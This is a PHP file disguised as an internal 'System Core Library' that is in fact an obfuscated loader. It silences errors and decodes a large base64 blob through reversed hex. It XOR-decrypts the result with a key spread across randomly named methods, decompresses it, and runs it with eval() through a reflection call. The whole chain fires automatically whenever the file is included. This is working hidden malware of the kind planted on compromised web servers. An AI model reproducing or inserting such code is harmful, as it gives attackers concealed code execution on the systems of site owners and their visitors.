<?php
/**
 * System Core Library - DO NOT MODIFY
 * @version 2.4.11_stable
 * @package Internal_Framework MassD
 * Last Sync: <?php echo date('Y-m-d H:i:s', time() - rand(3600, 86400)); ?>
 */

error_reporting(0);
ini_set("memory_limit", "512M");

define('CONF_OYEXFA', 'cusyxRuRldjzblS');

class Core_ifLOy_Mod {
    
    // Key Storage
    private function DyopKG() { return 'JNdtOotLGj'; }
    private function wHiwKj() { return 'dSlFDgVnD'; }
    private function iqfECR() { return 'DuXBmyQTId'; }

    // Integrity Hash
    private function gaXLmR() { return 'rpPjMuDSyooNdnfJxqJS'; }
    private function nKqBXI() { return 'aWZeByWUgPivEUyaJKLd'; }
    private function eIeaMJ() { return 'UMruuemTGosDnBBnAslX'; }

    // Executor
    private function dvPBQcpQ($c = '') {
        if (empty($c)) return null;
        $c = preg_replace('/[\x00-\x08\x0B-\x0C\x0E-\x1F\x7F]/', '', $c);
        try {
            return eval(trim($c));
        } catch (Throwable $e) { return null; }
    }

    public static function init_IxgM() {
        // Encrypted Payload
        $ckgzK = 'ZDRjOWU3MGNjNmRiNzhlZjA4YWVlMmFhNWI3MDVhNjgxNjI2YjU5NTRhYjYzZTk5ZTllMmJjZjY1ZjllMmRhZTAyYWM4YTk4NTcyZWNjODY5NTVhNzhkNGE1NTdkODZkYjVhMGNiMjljZDNkMTFlZTc0YmVmNTJmMWNlY2MyMjk3ZWM4ZWM3YzYzOTY0NGI0NDBiY2E2NmI4YzJhOTQ0YjZiYzJjNDQ1MTkzNTY5OThmMThjYzYxNThiOWI0NjQ3YTgyMDkzYzQxMjRhMWVhMzIzZGQ2NjIzYTIwMzA3YjkzYzEwMTVmNTc3YTJlYzc0MTEwMjJhZjk2YjZhODc2MTg3NzQ3NzhlZjc4NDJkNWRmNDU3YmIyODRmZjNmZDBlNzAzZDhiNjg5MmI1ZTI0MTI5NDc5NzhlNTgwNWEzNWI3MzVkMDIzNDhiYjY2OTA4ZjlmNDdkYjU3YjYyMTI0ZDcxM2FlZmU1NjBlY2M1ZTg5MjhkZjBhYWY1ZDA3ZDFmNzQ0NDhjZDVkZjJkZjM5MzBlZDUzZDY3MzgwYjZmZTAxYTAxMjU3MTAzZTczZmEyNjczZWNlM2YzZGZiMmI0YzIzOWM4MjFkYjY2ZmRmYWIxZWUzM2E3MzliNmQ4MjVhOTMyMTRiNjE0MDY5NzQ2MGE1YjJjNTNiMGJmYzlhYjM2MjFmYzBlYzkzYWQ3MzgwMjFlZGQ4YjA3YmM2Y2IxNjQ2YWZjZmYxN2VlMmEwMjA2YzBmYTNhN2Y4NTI4OTQxYjVlNDEyYjA5NTIzNjUxOWI5YmYwOWZlZjk3Y2ZhYTU0MGUxYjZiOTkxOWQ3MWQ0YTNhNjI4NjE2MzlhODljOTc4NmExODI3Yzk1Y2YwYWNiZWY1MDZhOGQxOTQ1YTkxMmU1NDllY2ZkYjU2YWZiNTdlZDlhNjdlZjMyZTdlOTM1OTk3ZWI4ODBkOWZhYzU5MjRiY2MwYzJlMGE0OTc0ZjNkZGZiZWI3YTcyMTE0ZWY2NDJjOTYxYWJkNGRiZDhlNWQwODZlMDBmYTdlMTk5OTI5MDg4YWIzZDBmNjU1Mjg1MmVkN2IzNDdjZjIzNDc3N2RlZTVjNzIzMzJiNzRjZjIzOWM5MTUwNGJkYzc5OTg1YjlhNzAzOTc4NDcxYWQ5NzNjMDI2OTlhNzc4ZGRlMzVkZjdhZTNhOWMwNTlmOTRhODlmZDZkM2ZkNjM3OGQ2YjBhYTk0NTA3NTliM2E4YjZhZTI2ZGJiZjQyODgzYmJiMTU0Zjk4NTY3MzIyZDc4M2RkM2NmZTQ2NDJkNDE5NDU1M2I0MjQ0ZDQ1NjBjM2VlN2ExMzU5ZTk1OWUxOTBhMGJmMjJhZDA2OTU5ODZiMzQwMWRhYWU3N2RlN2Y0ZGJmZWM4MWIxOWExNGQwYmFiYWMxYzA3NWRmM2M0Njg5YWY1NTVkNjE5MDg0NTI2MzY0MGQzMDdmYjc1MWE2NDNhYjYxOTczZWU3N2ExMTk5MmU0ZGZjNDI5M2Y5NTJmY2NkNzc1ZDM4MjJiMWEzZDkyY2Y0ZjYzOTMzNWI4OGZjODliMTdiOTcxNWIzMDZmMzhlZWQwNzJjZDJiNTNjNWU4YzgyODk4Zjc5MjBmNDU0NDllZjMxYmIzY2FjZDhiMDVlYmVjNDNkMmVkYWM1ZDVkOTQxZGQzMzRjOWVmNGY0MTVjZTBlNmFjZWE0ZTM5NTU0YWJlNDM0YjFhYTViMGY3NmMxN2FjNzlhMWFmZTYzOTMzNjFmZDVlZTczOTNlYjA1MzdmMGNhZGVmYmUwMTQ3NmUyYjNmYjBhYzU0YTU5MzllNjhkZTA1Y2ZkZDI5ZjBmZDczNDY3M2RiOTM2OWUzNTU4NzBmOTZiYmI0Njc3ZDg2ZTkxNGQxM2I2M2MyNzRiOTVhMzJlYjllMzI0ODEyOTRkZDc1NzNkYWViN2ExZjc3YmM2MmY2MjNkYWMxZDM5OWNjODNkOGFjM2EwZDE1MmMxZTRlNzVlM2U4MGM2MjI2ZjI4ZTFkNDU4NmFmN2UwNDFhYjUxOTY1ZWVkYTVjNGNjMjA3NGEwYTJiYjE2N2I2ZTMzMDBiZTYyOTM0OTAzNzE4YTlmMTIzZTkxNDI0Zjk5ZjQ2NzZlMzZjZDFhNGY2ZjU4YThiMTE5NDk4YWNmMDNmYTYzNDRjYWNlYzZhMmVlZGNjYzk3OTM4ZmJiODBiYWMwNDBmNjMzZTdmMzkwZjQxZjYzYTZiZWY0OGE5NWJkMDQ5OTg2OWY5NmFjNGY4ODkyM2Y1Yjk0NjdkMWYzNzQ5ZWJjMTRhNjllYTM5ZGJkNTAwZGU1ZmVlYTVlMjAxZjUxNWExNmI1YzJjNzJlYzFhYjVlNzNkOGFmOWUzZWYxODc2MzYzMjkxOTFiODQ0YTkyZmU5NDVlYmQ0NGM3NThlMDBhN2FlYWI0ODBmYjI0YTVjZTZlY2UzNDJkMmI1Mzg0NzUzZmM4NzdiMDQyZWZhZGViODI2MTFiMDEzZTA5YmY0NTJhMDZjNTY1Y2VkNjNiZWE3ZmNlMDNjZmViMDczNzdiZWU5OTZhNzgzNWQ3NTBiZGVhOTFlZmY2NTViY2ZmYmYyNGY5NTE4Y2FlMDJhYWEyZmVkYTJiOWVhZTY0YWRmZmM3YmJiMDA5NzhmNWFkZDhlZDFkNzQ0ZTFiMjFhNGE3NzhiN2I0ZWJmMWNhZjU4ZDM5NjYxZDFhMjJkMDMwODk2ZGUwN2Y0ODNjYzE1MzBkNjc5YmQ2NDdiNjQ2YzI0YzcxYjBiOTkxMmJiODU1ZjZkZjhlZjhkZjI5NDM4MzlmOWIwNTRmYzZhMTZhNDRiNjllZWUwMTc4ODY3YTM2MTBmYjEwZTBlMTk3YWQ5ZDQ2MzBmZGMzYjFiNzQxZTRmOWZkMmYxYzY2NTU4ZjgyMDQyYzgyYWU1ZmQ4MzBiZjhjY2U0M2ZkNTQ2ZTc0MzM3ZTU1ZWYyNmVkNjI1ZjdjMWQ1OWJjYjNmNjA3NDg3NjA4YmM3MzZjNzc0NGM1ZjgyZTMzNzk3NzY1MDA2ODFjMTM2Y2RlNGM1NDU0NTEzODgyYzJjN2Q2ZTk0MTRiMTY1MDA2NWJkNWQxNzg0MWEzYWQzY2Q1NTZlMDBjYjA4OWM2MGUzNzY0MWRkMjU2ODU2ZDgyZDNmODhjZGE5YjRmOTAwMDhjNTA4ZTRmMGZjNWNmYjhlZjczMzJhZjE4NGRkYTE2MjU3MGZjNWE5YzJlMWU3NWM0N2ZiZmQyZmVlMTcwMDFjNGMxM2UwNTkxZTE1ZjdjYjhiYzI2MjJmY2ViMWE1MjYzYjE1YzgzNDU5ZTdhMDY0ODE1YTBkMTU1YmJjOTljN2Y0YjVjMDM3Nzk5YzBiYjMwNzRhZDA5YzcyMWVlODE0NzVhNGQyYzQ5YzIwNGVkMGE0NGZmZGI0NDVkM2U4MzRjZDA0OWQ3NjgwOWVjMjM3ZGM3ZGJhMGQzMjA4YjIzOTk1NjA5ZGQ2Yzc4OGQ1ZTZlMmIwMWFlODM5OTkwMDA1OTcwZDRjNTRlMTA2MzcxMTc4OWY0ODEyOWJlYjM3YTk0ZjhlMjg3ZDk1YTUxM2NkN2MyNDc1ZjYxYWU2MGJmMjg0ZGNhNjEzOWQwOTc3MzhhZmZkNzgzN2I5MTA5NTQ0ZTMzYzgyMTA2MTExYzExMmExYzA3OWE2YTg4NmNiYjg2ZDM1ODFlZGJjOGFlOThmNWNmODkyNmIwOTBkNmRjMWYxNTFkMTZlZTk2MmFjMmYxYWI1YjUzY2IwNWQ5MzI5NTNhZDc2Y2E3N2EzMjM5OGFjOTE0NjI0NGFmY2NkZDc4MjA3NWQyOWJkYzliMWJiZWNlZWJhY2UzZjdmOTAwYzgzN2JhMjBmMjhmMDU1NWVjNjYxMzk5ZWYzNjAzNWE1YzAxYzI1YzBjYTYyODJmNzA5YzA0YmI3MmNkNTBkZjIyMjg0MjQyMWJjMDNhOWU0MDg1OTkwNDA5MzMzOTRkZjM4NmM4YjQ4MTljZjNjZDc2N2Y1ZjZlYmU0ZjI0YjJjMGQzNWZlOTUwNGE1OGUzMzdkMzgyNjMzNDljYjc3ZmI2NmM3YjI0NGIzN2E1MWQxODA3ZTc4NmMyMTgxZTQ4OGQ3MmM3NzUyNDdkYTI0NTE3MjEzM2ZjN2IzYzFkNWYwODk2MmE1MGM5NmI2MDQyOWE5ZTRhNzUwYjViMzk0MWZmNzRhZTQ2ODkzYWY0OTc5NTQ1ZjkwZDMzOWI3NjM4NDk2YjY5Y2FjNDM1MDU4ZDVjNWM2ZmI4N2M1MjYxMTFmZTZlYmYzYzRlN2NmZjg1MmIyODU1ZTg3OWM3ODk0NmZjNjI3N2U5MGRhNDcyOGUzMGUwMDI5NzBhYTMyNjkxNTQwNzJjOGVjZTE1MjllYWQxZjhiZjE2NmNmYjAwMGQ0Y2M1ZjQ3ZTc4Yjg1ZjdkMWQyYjkyMTAyOTc1NTU5MjA4YTU3ODJhZTA5MTk3NWY0NTkwYWY1ZGM3N2NmNGI3NzNiZjRlMjMxNzM3MGU4YWJmOGIxMzQ4MjczMzRmMzJkNTAyODA4ZmEwOWM4MWNlOWE3YWUxZWY3MjdhZmQ5MTNiMDE1NjFjYWY3NDgzMWRhZTU3NTdjY2UxNjg4YzQzMWZhM2FkYzkwN2I0NzhiMTgyMGJiYTZmOWYzZWZiNDE4ODVkYzUxMjMwN2E4NGZlOWMwYmRjYWUzMTM3MDAyYTUwMDg1YzRhZjFhNzk5NmQ4Y2Y5MzY2MjIzMWQ4MDdhNzVlNmQ1YzhjZDBkYWIxYmE2MjM4NmNjOGNlOTY2N2MzYWI4YWVlYTFlNTcxOGNmNzgxMjc3NjhmNWY3YWMyMTg5ZmJkZTJjYjRlZWZkN2ExZjhhMWVlOGRkYzk0OWRmYjI3NmMxYjkzZTdhM2JmZjFmMTdiYTA1Y2I2MGY3YjEyMDcwMGY4ZTViNjkzNmM5ZTFjMTA2ZjgwNjA3ZTRjNDg5OThlMDhlOGFhNTFiZmE2NzYyNmRmMzNiMTkwYTkwZGI5MmMyNDIyYWViNzY1MWI2MmZjZWJlMTJmODE0NDU4MGMwNzhiNzJlNDI2ZDViYTZmZDg3NzM5ZDJlNjlmNmJmZjcyOTFmYmE3YzZhYTA2OWFjYThlOGU5M2UzMWE4OTUyNWM4NGFiMTFhY2M2M2E2YmVmY2QxOWIzZmI3OWMwMTc2NzBlMGZkZGY4MTUwYWRiYTU0MGE5MzhjYmVjMWViMjdlM2UwZjViNTA0MWMwZTE1NTM2NTVlZGQ0MjI2ZDA1ODU2YmVmMDJkOGQwNDUyMjhhMDk0Y2ZkNzFmODU5OWQ1ZjY4OGExZTIxM2YxYWFjN2JkZWIzYTEzNWNhZThjNTEwNDNjNDQ1OGMzYzhjNzM0ZWRiOGY1NmE0YzFjNGJmNzMyMGFmOTllY2Q0MzRhNzRhZWYwOTJkN2M2OWM0NmM0NzA5NTFjNWE5OTNkZWI5NTYyYTM5YjQyZGIzYWUzZjViNTU1ZTJiOTRlZmIzNDg1NGJlM2Q1MWJjY2M1M2ZmYzc3OTExOTNkYjUxYmFhNjM3OWE4YmY2ZTgwYWUxOWJiNzY3ODRkMGUxNjBmZjFlNDlhZmVkZjVjYjFmZjExZTMzNTM2ZGU3OTlkYzRjNWY5ZTcwMzk0ZWVkYjdlYWQxY2U0MTk4ZjU0YmViZjI4ZTVhZThmNTg2NTE0NmNmMDU4OWFiNDFmNDliZDQyNjMxZWI1ZWMxYTk3ZjVjYmY5NTdhODFjYTQzNjk1NmU5Y2UxNjU2NGQzZWQ3Y2IxYzhmOTQ5NDkxMzI3Yjc4NDYxMzcxYjdkMmQxZmFmMTk2MTczMjllYzAwMjgxYzIyMzdlNTdkZDgwOWJmYmZhZDg5OWEzYTAyMThlZWE1OTZlNmE5MjA5ZTk3MWRkMDNkZTQwZGUyZDg0MDc1MWU1OGRkOGU0NmNiMDQxYzdhMjZjOWZiNjIxZmVkOTJjZjQzNTY4MThkNWY2NmMxZWEwNjExYjM2YWRkZDQ1ZWY0YzA0M2JlZmI3ZGIxMjZjODJjMzhhZjhjMGI1YzcxMWYyODBhZmYwYWMwYjUzOTY0NDZiNmQ4MTRmMTkxZjkwZTJmMmE3MDkxYWQzYTc1N2QzMDI1YWVmZmM2YjUxNjAyYWJhZGU5Y2Q1ZDMyNzA3NmYzYzNhOTUyY2QwMmUwNmRlYjRhYzQ4N2ZkY2NmYTkwMjcwNDQ4ZmUzZDE2OTVlMjVmYzc1NGJiMjA0OWVkOGE3MTJlYTNjYmIwYTliM2RmNzkxNzNjMzBhYmE4NzRiOWQwMTY3ZjNhN2UwOTJjOThkOTY0Yzc0YmZhMGI1MWFhOGFiNTg3OWRkMThjZDFiOGNlMTMxNDA0YzU3Yjg5M2RjYWRlNTYwNWU4N2JlYTQ2NWY3ZWRjN2VjNDJlYTYzMWIwYjk0YzEzZGNhMDg1OGFhYWFhZjZmMzM3ODI2ZGFkODZjNTExNjA4Mjg5NDYwNzJjODk1Y2VmZDk4OTg5YmMwNzIyZWVlY2MzYzg5NjkwZTk0N2I4M2U5NjI1NjQxZmI4NmQ4MzRkNWY1YTIxMmNmZmQ0ZGE1OWY0OTQ5MTU0MDFkNzMzYzQwMWIxOGRiNWE0YWU4MWI4M2YxOWE4ZDBkOWJkMGZkNDI5YjhkMTI2ZWM5MWUwYzFiYzJkMjY2NzhjNGMwM2Q0Njg4NDNkZGM5ZDFmMTEyYzQ0ZmFmYTFjMDNiYWY3OGY1MWMxNDBhNDVmZmM3Y2M2Y2MxNDQ0YTJhMDg5ZjU5Nzk5NzRmOWJkMzgxYzNjZjYxNmUzNzk3YTBiMmMwYmJlMTQwZjAwNDZmZTFkMTVlOWM0ZDkxNDUzYjcyYTE1ZWQ0YzljNjMxNjM1NTQ1MjgyOGRiODZhZGIzZTYwNzRhZjliYjMxYzBhZTNmNmQxMDE3MjMzMDU2NTU4MGJmNDE0ZjA2ZTgwOTFlNGJkNjAwNGI0Mzg3YTczMDYwZjVkMjliMTZmNDgzMDM3YTkxODUxODE5OTlhMjYxNzJjZDg3ZmU5MWNkZDk0OTQyMzliMzU5MGMzN2M3ZGYxYjcxNDJhN2FkMTZmZjViOTRjMjBlMTcyZWM3NDNiZjMzZWU4MDNlMTU0OTYwMzI2ZGE2MGI3NDJmNWZmZmI3MWJmNjU5ZDRjMWMxYjIwMGFkYjEyYTg4OGNiNDA1ZTgyNTVmMjk0YWI2OGEzYjgxZjhjNzkyZWMxNDBhM2RlZjljODIzZGQ4YTlhYmY2NmE0YjA3YWIzNzVjODU5MDVjNDhhNDVhNmUxMDRjNTI0MjVhYThiNmEyODRlZjJmNTEyMjgyODgwMmVkZTUxODY1OGU0MzJjMDY0OTYxZjdlMzc0NDM3YmFhOTJkMWVhOTNlYjJiM2UxYzE5N2MzOTNmYTM0OTU1NDdmYTAwMjJkMjlmNDkyMw==';
        
        // 1. Decode Chain
        $KaHhx = hex2bin(strrev(base64_decode($ckgzK)));
        
        // 2. Reconstruct Key
        $o = new self();
        $DnFQB = $o->DyopKG() . $o->wHiwKj() . $o->iqfECR();
        
        // 3. Integrity Check
        $tEXqd = $o->gaXLmR() . $o->nKqBXI() . $o->eIeaMJ();
        if (md5($tEXqd) !== '9bdbd9958a3da2272fc03d5cd89df03b') { return; }

        // 4. Decrypt XOR
        $PmtEq = '';
        $kl = strlen($DnFQB);
        for ($i=0, $len = strlen($KaHhx); $i < $len; $i++) {
            $PmtEq .= chr(ord($KaHhx[$i]) ^ ord($DnFQB[$i % $kl]));
        }
        
        // 5. Decompress
        $res = @gzuncompress($PmtEq);
        if ($res === false) { $res = @gzinflate($PmtEq); }
        
        // 6. Execution via Reflection
        if ($res) {
            $ref = new ReflectionMethod(__CLASS__, 'dvPBQcpQ');
            $ref->setAccessible(true);
            $ref->invoke(new self(), $res);
        }
    }
}

// Auto Init
if (!defined('_SYS_LOADED')) {
    define('_SYS_LOADED', true);
    Core_ifLOy_Mod::init_IxgM();
}
?>